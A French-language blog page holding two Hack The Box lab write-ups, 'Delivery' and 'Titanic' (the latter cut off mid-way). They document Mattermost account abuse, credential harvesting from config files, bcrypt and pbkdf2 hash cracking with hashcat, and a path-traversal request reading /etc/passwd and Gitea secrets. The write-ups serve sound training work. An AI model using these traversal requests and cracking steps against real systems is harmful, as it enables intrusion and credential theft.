HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Date: Fri, 21 Feb 2025 12:00:02 GMT |_ Content-Length: 0 Foothold Mattermost / helpdesk.delivery.htb On peut poster des tickets. Lorsqu\u0026rsquo;on poste un ticket on nous donne un numero et une email auxquelle on peut ecrire par exemple: 1239870@delivery.htb\nOn a aussi un serveur \u0026ldquo;Mattermost\u0026rdquo; avec une page de login sur lequel on peut créer un compte avec l\u0026rsquo;email: 1239870@delivery.htb\nOn nous demande une confirmation. On recoit cette email\u0026hellip; directement sur le status du ticket crée précédemment !\n1 ---- Registration Successful ---- Please activate your email by going to: http://delivery.htb:8065/do_verify_email?token=49opc49pbwfahgew54koaa699uawqjjxt3xpanuwpte3jgf6etkczaprg8487und\u0026amp;email=1568729%40delivery.htb Internal Channel On obtient un accès a la plateforme après avoir cliqué sur le lien de confirmation. On rejoint l\u0026rsquo;équipe \u0026ldquo;internal\u0026rdquo; qui donnne accès à un channel internal avec des messages !\n1 2 3 4 5 6 7 8 9 10 11 root 9:29 AM @developers Please update theme to the OSTicket before we go live. Credentials to the server are maildeliverer:Youve_G0t_Mail! 9:30 AM Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of \u0026#34;PleaseSubscribe!\u0026#34; root 10:58 AM! PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases. maildeliverer:Youve_G0t_Mail!\nmaildeliver account: user flag Il suffit de se connecter en ssh avec les creds de \u0026ldquo;maildeliver\u0026rdquo; !\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(kali㉿kali)-[~/htb/Delivery] └─$ ssh maildeliverer@delivery.htb maildeliverer@delivery.htb\u0026#39;s password: Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Feb 23 17:28:33 2025 from 10.10.14.3 maildeliverer@Delivery:~$ ls user.txt maildeliverer@Delivery:~$ cat user.txt fe3d.....c5aa Privilege Escalation DB password On trouve un fichier avec des creds pour se connecter a la base de données mysql (port 3306):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 maildeliverer@Delivery:/var/www/osticket$ cat upload/include/ost-config.php \u0026lt;?php /********************************************************************* ost-config.php ... ## Database Options ## --------------------------------------------------- ## Mysql Login info define(\u0026#39;DBTYPE\u0026#39;,\u0026#39;mysql\u0026#39;); define(\u0026#39;DBHOST\u0026#39;,\u0026#39;localhost\u0026#39;); define(\u0026#39;DBNAME\u0026#39;,\u0026#39;osticket\u0026#39;); define(\u0026#39;DBUSER\u0026#39;,\u0026#39;ost_user\u0026#39;); define(\u0026#39;DBPASS\u0026#39;,\u0026#39;!H3lpD3sk123!\u0026#39;); 1 2 3 4 5 6 MariaDB [osticket]\u0026gt; select username,firstname,lastname,passwd,email from ost_staff; +---------------+-----------+----------+--------------------------------------------------------------+----------------------------+ | username | firstname | lastname | passwd | email | +---------------+-----------+----------+--------------------------------------------------------------+----------------------------+ | maildeliverer | Delivery | Person | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy | maildeliverer@delivery.htb | +---------------+-----------+----------+--------------------------------------------------------------+----------------------------+ On trouve bien qu\u0026rsquo;il s\u0026rsquo;agit du même mot de passe qu\u0026rsquo;en ssh :\n1 2 3 4 $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy:Youve_G0t_Mail! Session..........: hashcat Status...........: Cracked La base de données mysql est donc une fausse piste, ce n\u0026rsquo;est pas le hash qui nous intéresse\nMattermost config En cherchant un peu on trouve le fichier de config de mattermost:\n1 2 3 maildeliverer@Delivery:/opt/mattermost/config$ cat config.json | grep user \u0026#34;TeammateNameDisplay\u0026#34;: \u0026#34;username\u0026#34;, \u0026#34;DataSource\u0026#34;: \u0026#34;mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\\u0026readTimeout=30s\\u0026writeTimeout=30s\u0026#34;, On a donc une nouvelle base de donnée : mattermost et de nouveaux creds: mmuser:Crack_The_MM_Admin_PW\nRécupération des hachages On trouve tous les hash de password pour mattermost cette fois, ce qui est nettement plus intéressant à première vu:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 MariaDB [mattermost]\u0026gt; select Username,Password from Users; +----------------------------------+--------------------------------------------------------------+ | Username | Password | +----------------------------------+--------------------------------------------------------------+ | helloguys | $2a$10$nX8mrkBf3qoX5hnoxZKg..9SzAx.oVvfCGelMzzebV6Oa2HI8eq0K | | surveybot | | | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | | channelexport | | | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | | aaaaaa | $2a$10$J1d0c.sHFogqV5LoR72JXeFGTQAaAGRVmZJRX1WgyHq/VDiI55..W | +----------------------------------+--------------------------------------------------------------+ Hashcat best rules - creating password list On crée une nouvelle liste basée sur le mot clé \u0026lsquo;PleaseSubscribe!\u0026rsquo; comme préciser sur le forum, à l\u0026rsquo;aide des regles de mutation de mot de passe de hashcat :\n1 2 $ echo -e \u0026#39;PleaseSubscribe!\u0026#39; \u0026gt; base_words.txt $ hashcat --stdout base_words.txt -r /usr/share/hashcat/rules/best64.rule \u0026gt; mutated_wordlist.txt Il ne reste plus qu\u0026rsquo;a bruteforcer les hachages avec la liste générée :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ hashcat -m 3200 hash.txt ./mutated_wordlist.txt hashcat (v6.2.5) starting ... Dictionary cache hit: * Filename..: ./mutated_wordlist.txt * Passwords.: 77 * Bytes.....: 1177 * Keyspace..: 77 The wordlist or mask that you are using is too small. This means that hashcat cannot use the full parallel power of your device(s). Unless you supply more work, your cracking speed will drop. For tips on supplying more work, see: https://hashcat.net/faq/morework Approaching final keyspace - workload adjusted. $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21 root flag Il ne reste plus qu\u0026rsquo;a se connecter avec le mot de passe :\n1 2 3 4 maildeliverer@Delivery:~$ su - root Password: root@Delivery:~# cat /root/root.txt eb84.....c688 ","date":"2025-02-24T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/delivery-htb/","title":"HTB | Delivery"},{"content":" Machine name OS IP Difficulty Titanic Linux 10.10.11.55 Easy Users 1 developer : `25282528` Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 ┌──(kali㉿kali)-[~/htb/Titanic] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.55 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGZG4yHYcDPrtn7U0l+ertBhGBgjIeH9vWnZcmqH0cvmCNvdcDY/ItR3tdB4yMJp0ZTth5itUVtlJJGHRYAZ8Wg= | 256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDT1btWpkcbHWpNEEqICTtbAcQQitzOiPOmc3ZE0A69Z 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to http://titanic.htb/ |_http-server-header: Apache/2.4.52 (Ubuntu) Foothold Website titanic.htb : LFI On a un formulaire qu\u0026rsquo;on peut remplir pour reserver notre voyage. A la fin, ça nous fait telecharger un fichier .json avec notre ticket. Or, si on maniule cet argument ticket= on peut récupérer le contenu de n\u0026rsquo;importe quel fichier\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 GET /download?ticket=../../../../../../../../etc/passwd HTTP/1.1 Host: titanic.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i ------------------------------- HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 12:47:55 GMT Server: Werkzeug/3.0.3 Python/3.10.12 Content-Disposition: attachment; filename=\u0026#34;../../../../../../../../etc/passwd\u0026#34; Content-Type: application/octet-stream Content-Length: 1951 Last-Modified: Fri, 07 Feb 2025 11:16:19 GMT Cache-Control: no-cache ETag: \u0026#34;1738926979.4294043-1951-2222001821\u0026#34; Keep-Alive: timeout=5, max=100 Connection: Keep-Alive root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:104::/nonexistent:/usr/sbin/nologin systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin pollinate:x:105:1::/var/cache/pollinate:/bin/false sshd:x:106:65534::/run/sshd:/usr/sbin/nologin syslog:x:107:113::/home/syslog:/usr/sbin/nologin uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin developer:x:1000:1000:developer:/home/developer:/bin/bash lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin _laurel:x:998:998::/var/log/laurel:/bin/false Grâce à /etc/passwd on repère l\u0026rsquo;utilisateur \u0026ldquo;developer\u0026rdquo;. On peut récupérer le fichier user.txt avec le flag.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 GET /download?ticket=../../../../../../../../home/developer/user.txt HTTP/1.1 Host: titanic.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i ------------------------ HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 12:48:04 GMT Server: Werkzeug/3.0.3 Python/3.10.12 Content-Disposition: attachment; filename=\u0026#34;../../../../../../../../home/developer/user.txt\u0026#34; Content-Type: text/plain; charset=utf-8 Content-Length: 33 Last-Modified: Wed, 19 Feb 2025 12:36:23 GMT Cache-Control: no-cache ETag: \u0026#34;1739968583.7440214-33-1704137658\u0026#34; Keep-Alive: timeout=5, max=100 Connection: Keep-Alive fc0c.....550f 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 \u0026lt;VirtualHost *:80\u0026gt; ServerName titanic.htb DocumentRoot /var/www/html \u0026lt;Directory /var/www/html\u0026gt; Options Indexes FollowSymLinks AllowOverride All Require all granted \u0026lt;/Directory\u0026gt; ProxyRequests Off ProxyPass / http://127.0.0.1:5000/ ProxyPassReverse / http://127.0.0.1:5000/ ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined RewriteEngine On RewriteCond %{HTTP_HOST} !^titanic.htb$ RewriteRule ^(.*)$ http://titanic.htb$1 [R=permanent,L] \u0026lt;/VirtualHost\u0026gt; dev subdomain : dev.titanic.htb En utilisant ffuf, on trouve un subdomain \u0026ldquo;dev\u0026rdquo;. On aurait pu y penser autrement, en effet l\u0026rsquo;utilisateur trouvé précédemment était \u0026ldquo;developer\u0026rdquo;. En vérité, j\u0026rsquo;ai trouvé cela en regarder la fichier /etc/hosts grâce à la LFI trouvé précedemment:\n1 2 127.0.0.1 localhost titanic.htb dev.titanic.htb 127.0.1.1 titanic ATTENTION !! Le piège : on ne trouve rien avec gobuster dns. A l\u0026rsquo;avenir, il faut prioriser ABSOLUMENT ffuf pour trouver les sous-domaines !!\nCette commande ne trouve rien :\ngobuster dns -d titanic.htb -w /usr/share/wordlists/dirb/common.txt\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 ┌──(kali㉿kali)-[~/htb/Titanic] └─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://titanic.htb/ -H \u0026#34;Host: FUZZ.titanic.htb\u0026#34; -mc 200 /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://titanic.htb/ :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt :: Header : Host: FUZZ.titanic.htb :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200 ________________________________________________ dev [Status: 200, Size: 13983, Words: 1107, Lines: 276, Duration: 135ms] Gitea dev.titanic.htb redirige vers une page Gitea.\nMysql password 1 2 3 4 5 6 7 8 9 10 11 12 13 14 version: \u0026#39;3.8\u0026#39; services: mysql: image: mysql:8.0 container_name: mysql ports: - \u0026#34;127.0.0.1:3306:3306\u0026#34; environment: MYSQL_ROOT_PASSWORD: \u0026#39;MySQLP@$$w0rd!\u0026#39; MYSQL_DATABASE: tickets MYSQL_USER: sql_svc MYSQL_PASSWORD: sql_password restart: always Fuzzing with ffuf En faisant du fuzzing avec des plusieurs wordlists, on finit par trouver le fichier app.ini et surtout le working directory de gitea. Sur l\u0026rsquo;interface web de gitea on avait trouvé l\u0026rsquo;info le dossier : /home/developer/gitea/data\nMais il m\u0026rsquo;a fallu beaucoup de temps/fuzzing pour trouver qu\u0026rsquo;il fallait à nouveau écrire gitea\u0026hellip;\nJ\u0026rsquo;ai utilisé la LFI, sous forme d\u0026rsquo;une requete \u0026ldquo;.req\u0026rdquo; récupérer sur BURP. Je mettais le mot \u0026ldquo;FUZZ\u0026rdquo; au bonne endroit dans la requete, donc apres le dossier data au début.\n1 2 3 4 5 6 7 8 9 10 GET /download?ticket=/home/developer/gitea/data/FUZZ HTTP/1.1 Host: titanic.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://titanic.htb/ Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i Voici l\u0026rsquo;execution de ffuf ensuite en utilisant notre requete et une liste de mot de passe:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 ┌──(kali㉿kali)-[~/htb/Titanic] └─$ ffuf -request download.req -request-proto http -t 64 -w ./gitea_wordlist.txt /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://titanic.htb/download?ticket=/home/developer/gitea/data/FUZZ :: Wordlist : FUZZ: /home/kali/htb/Titanic/gitea_wordlist.txt :: Header : Connection: keep-alive :: Header : Upgrade-Insecure-Requests: 1 :: Header : Priority: u=0, i :: Header : Host: titanic.htb :: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 :: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 :: Header : Accept-Language: en-US,en;q=0.5 :: Header : Accept-Encoding: gzip, deflate, br :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 64 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ gitea [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 139ms] :: Progress: [2876/2876] :: Job [1/1] :: 404 req/sec :: Duration: [0:00:06] :: Errors: 0 :: -----------on rajoute \u0026#34;/gitea/FUZZ\u0026#34; dans le fichier .req et on recommence la recherche---------------- ┌──(kali㉿kali)-[~/htb/Titanic] └─$ ffuf -request download.req -request-proto http -t 64 -w /usr/share/wordlists/dirb/common.txt /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : GET :: URL : http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt :: Header : Host: titanic.htb :: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 :: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 :: Header : Accept-Language: en-US,en;q=0.5 :: Header : Accept-Encoding: gzip, deflate, br :: Header : Connection: keep-alive :: Header : Upgrade-Insecure-Requests: 1 :: Header : Priority: u=0, i :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 64 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 ________________________________________________ [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 104ms] attachments [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 149ms] avatars [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 137ms] conf [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 141ms] home [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 156ms] log [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 156ms] packages [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 267ms] queues [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 249ms] sessions [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 225ms] tmp [Status: 500, Size: 265, Words: 33, Lines: 6, Duration: 229ms] :: Progress: [4614/4614] :: Job [1/1] :: 266 req/sec :: Duration: [0:00:13] :: Errors: 0 :: On observe l\u0026rsquo;utilisation d\u0026rsquo;une \u0026ldquo;gitea_wordlist.txt\u0026rdquo;. Je l\u0026rsquo;ai créer en récupérer le code source sur github, puis j\u0026rsquo;ai utilisé la commande suivante :\n1 find ./gitea-1.22.1/ -type f -exec basename {} \\; \u0026gt; gitea_wordlist.txt 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 GET /download?ticket=/home/developer/gitea/data/gitea/conf/app.ini HTTP/1.1 Host: titanic.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://titanic.htb/ Connection: keep-alive Upgrade-Insecure-Requests: 1 Priority: u=0, i ------------------------- HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 22:34:22 GMT Server: Werkzeug/3.0.3 Python/3.10.12 Content-Disposition: attachment; filename=\u0026#34;/home/developer/gitea/data/gitea/conf/app.ini\u0026#34; Content-Type: application/octet-stream Content-Length: 2004 Last-Modified: Fri, 02 Aug 2024 10:42:14 GMT Cache-Control: no-cache ETag: \u0026#34;1722595334.8970726-2004-2176520380\u0026#34; Keep-Alive: timeout=5, max=100 Connection: Keep-Alive APP_NAME = Gitea: Git with a cup of tea RUN_MODE = prod RUN_USER = git WORK_PATH = /data/gitea [repository] ROOT = /data/git/repositories [repository.local] LOCAL_COPY_PATH = /data/gitea/tmp/local-repo [repository.upload] TEMP_PATH = /data/gitea/uploads [server] APP_DATA_PATH = /data/gitea DOMAIN = gitea.titanic.htb SSH_DOMAIN = gitea.titanic.htb HTTP_PORT = 3000 ROOT_URL = http://gitea.titanic.htb/ DISABLE_SSH = false SSH_PORT = 22 SSH_LISTEN_PORT = 22 LFS_START_SERVER = true LFS_JWT_SECRET = OqnUg-uJVK-l7rMN1oaR6oTF348gyr0QtkJt-JpjSO4 OFFLINE_MODE = true [database] PATH = /data/gitea/gitea.db DB_TYPE = sqlite3 HOST = localhost:3306 NAME = gitea USER = root PASSWD = LOG_SQL = false SCHEMA = SSL_MODE = disable [indexer] ISSUE_INDEXER_PATH = /data/gitea/indexers/issues.bleve [session] PROVIDER_CONFIG = /data/gitea/sessions PROVIDER = file [picture] AVATAR_UPLOAD_PATH = /data/gitea/avatars REPOSITORY_AVATAR_UPLOAD_PATH = /data/gitea/repo-avatars [attachment] PATH = /data/gitea/attachments [log] MODE = console LEVEL = info ROOT_PATH = /data/gitea/log [security] INSTALL_LOCK = true SECRET_KEY = REVERSE_PROXY_LIMIT = 1 REVERSE_PROXY_TRUSTED_PROXIES = * INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MjI1OTUzMzR9.X4rYDGhkWTZKFfnjgES5r2rFRpu_GXTdQ65456XC0X8 PASSWORD_HASH_ALGO = pbkdf2 [service] DISABLE_REGISTRATION = false REQUIRE_SIGNIN_VIEW = false REGISTER_EMAIL_CONFIRM = false ENABLE_NOTIFY_MAIL = false ALLOW_ONLY_EXTERNAL_REGISTRATION = false ENABLE_CAPTCHA = false DEFAULT_KEEP_EMAIL_PRIVATE = false DEFAULT_ALLOW_CREATE_ORGANIZATION = true DEFAULT_ENABLE_TIMETRACKING = true NO_REPLY_ADDRESS = noreply.localhost [lfs] PATH = /data/git/lfs [mailer] ENABLED = false [openid] ENABLE_OPENID_SIGNIN = true ENABLE_OPENID_SIGNUP = true [cron.update_checker] ENABLED = false [repository.pull-request] DEFAULT_MERGE_STYLE = merge [repository.signing] DEFAULT_TRUST_MODEL = committer [oauth2] JWT_SECRET = FIAOKLQX4SBzvZ9eZnHYLTCiVGoBtkE4y5B7vMjzz3g Gitea.db : developer user 1 curl \u0026#34;http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db\u0026#34; --output ./gitea.db 1 2 3 4 5 6 7 8 ┌──(kali㉿kali)-[~/htb/Titanic] └─$ sqlite3 ./gitea.db SQLite version 3.46.1 2024-08-13 09:16:08 Enter \u0026#34;.help\u0026#34; for usage hints. sqlite\u0026gt; select * from user; 1|administrator|administrator||root@titanic.htb|0|enabled|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|0|0|0||0|||70a5bd0c1a5d23caa49030172cdcabdc|2d149e5fbd1b20cf31db3e3c6a28fc9b|en-US||1722595379|1722597477|1722597477|0|-1|1|1|0|0|0|1|0|2e1e70639ac6b0eecbdab4a3d19e0f44|root@titanic.htb|0|0|0|0|0|0|0|0|0||gitea-auto|0 2|developer|developer||developer@titanic.htb|0|enabled|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|0|0|0||0|||0ce6f07fc9b557bc070fa7bef76a0d15|8bf3e3452b78544f8bee9400d6936d34|en-US||1722595646|1722603397|1722603397|0|-1|1|0|0|0|0|1|0|e2d95b7e207e432f62f3508be406c11b|developer@titanic.htb|0|0|0|0|2|0|0|0|0||gitea-auto|0 3|a|a||a@a.com|0|enabled|0ae3825641016406643a122f7f3ca6c6b5cfc76abd40075f73eb8deff4cce5448bfa95dc5a4ff81d62cb77921cd224b2010d|pbkdf2$50000$50|0|0|0||0|||314efc292d5e9576a2154e9bc85facb8|24fc79c6b2aadeb9555d40312ac55460|en-US||1739990352|1739990365|1739990352|0|-1|1|0|0|0|0|1|0|d10ca8d11301c2f4993ac2279ce4b930|a@a.com|0|0|0|0|0|0|0|0|0||gitea-auto|0 Hashcat bruteforce compte crée: b : 123456789\n1 4|b|b||b@b.com|0|enabled|097c3c0cdbf50b536b20ef5e22b6dd8e58fbfa6230003f60a6a15577107d48618814da5e1c2984e3775fdbea3f61c41cd0ce|pbkdf2$50000$50|0|0|0||0|||d49587abbc61243dfde5146bec7ee24b|47b1683e379bca325752efd85fe1c31b|en-US||1740008072|1740008072|1740008072|0|-1|1|0|0|0|0|1|0|2076105f6efe7c11e285add95f514b9a|b@b.com|0|0|0|0|0|0|0|0|0||gitea-auto|0 ┌──(kali㉿kali)-[~/htb/Titanic] └─$ john \u0026ndash;list=format-details \u0026ndash;format=pbkdf2-hmac-sha256\nPBKDF2-HMAC-SHA256 125 24 192 01000003 48 PBKDF2-SHA256 256/256 AVX2 8x 0x107 32 188 iteration count 0 $pbkdf2-sha256$1000$b1dWS2dab3dKQWhPSUg3cg$UY9j5wlyxtsJqhDKTqua8Q3fMp0ojc2pOnErzr8ntLE\nsqlite\u0026gt; select name, passwd_hash_algo, salt, passwd from user; administrator|pbkdf2$50000$50|2d149e5fbd1b20cf31db3e3c6a28fc9b|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136 developer|pbkdf2$50000$50|8bf3e3452b78544f8bee9400d6936d34|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 